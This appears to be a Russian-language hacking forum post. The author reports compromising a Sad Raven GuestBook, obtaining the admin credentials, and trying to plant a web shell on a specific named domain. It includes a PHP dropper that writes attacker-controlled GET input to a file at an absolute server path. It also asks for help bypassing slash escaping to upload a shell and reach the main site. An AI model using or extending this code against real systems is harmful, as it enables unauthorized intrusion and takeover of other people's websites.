Код:
<?
$open = fopen("/usr/local/psa/home/vhosts/sbmx.com.ru/subdomains/guest/httpdocs/script.php","w+");
fwrite ($open,$_GET['fp']."\\n");
fclose($open);
?>
Взломал Sad Raven GuestBook.
Получил пароль и логин админа.
Есть такая уязвимость там, что в дизайне сайта могут содержаться php-скрипты. Информация с
http://xop0k.h15.ru/adv/3.txt
В общем пробовал загрузить туда маленький свой скриптик, который содержит форму загрузки файлов в себе.
Передаю то, что надо записывать через GET переменную fp.
Все бы было ок, да эта гостевуха экранирует слеши вот такие:
Как следствие нельзя записать в текстовой файл переменные в таком виде:
Код:
fwrite($fp, "\$text=\$_GET['fp']");
и это проблема. Не знаю как решить. Причем поставив один слеш при каждом сохранении они увеличиваются в геометрической прогрессии
)
Вот думаю как ещё можно загрузить файлик со своего компа на сервер. Загрузить хочу шелл, чтобы получить доступ ко всему сайту, т.к. гостевуха нахзодится на отдельном домене guest.site.ru, а сайт находится на site.ru
Абсолютные пути известны